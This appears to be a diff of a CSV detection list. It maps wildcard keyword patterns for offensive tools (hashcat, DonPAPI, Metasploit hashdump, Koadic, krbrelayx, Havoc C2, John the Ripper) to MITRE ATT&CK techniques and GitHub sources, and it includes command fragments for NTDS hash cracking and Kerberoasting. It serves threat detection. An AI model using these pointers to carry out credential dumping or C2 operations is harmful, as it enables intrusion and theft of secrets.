-"*hashcat/hashcat*","offensive_tool_keyword","hashcat","Worlds fastest 
and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18342","2659","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" -"*hashdump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"*hashcat-*.7z*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"*hashcat.git*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"*hashcat/hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"*hashdump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential 
Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*hashdump_sam*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*HashDumpDCImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*HashDumpSAMImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*hasherezade/exe_to_dll*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*hasherezade/exe_to_dll*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" -"*-hashes* --escalate-user*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*-hashes* --escalate-user*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "*hashonymize --ntds * --kerberoast *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 
- ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*HashPals/Name-That-Hash*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*--hash-type 1000 --potfile-path*.ntds.cracked*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*hashview*@*localhost*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"*hashview/config.conf*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"*hashview/hashview*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"*hashview-agent.*.tgz*","offensive_tool_keyword","hashview","A web 
front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"*hashview-agent.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*hashview*@*localhost*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*hashview/config.conf*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*hashview/hashview*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*hashview-agent.*.tgz*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*hashview-agent.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" "*HasSPNNoPreauth*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" "*hatlord/snmpwn*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" -"*havoc client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*havoc server*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc.agent*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Havoc.git*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Havoc.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc.service*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" 
-"*havoc.yaotl*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Havoc/Client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Havoc/cmd/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Havoc/payloads*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Havoc/pkg*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - 
T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Havoc/Teamserver*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc_agent.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc_agent_talon.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc_default.yaotl*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc_externalc2*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc_service_connect*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc-c2-client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc-c2-data*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" 
-"*havocframework.com*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*HavocService*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*HavocTalonInteract*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*HavocUi.cpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*HavocUi.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - 
T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*HavocUI.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*hccapx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*hci_oracle_passwords*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*havoc client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*havoc server*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc.agent*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc.git*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - 
T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc.service*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc.yaotl*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc/Client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc/cmd/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc/payloads*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" 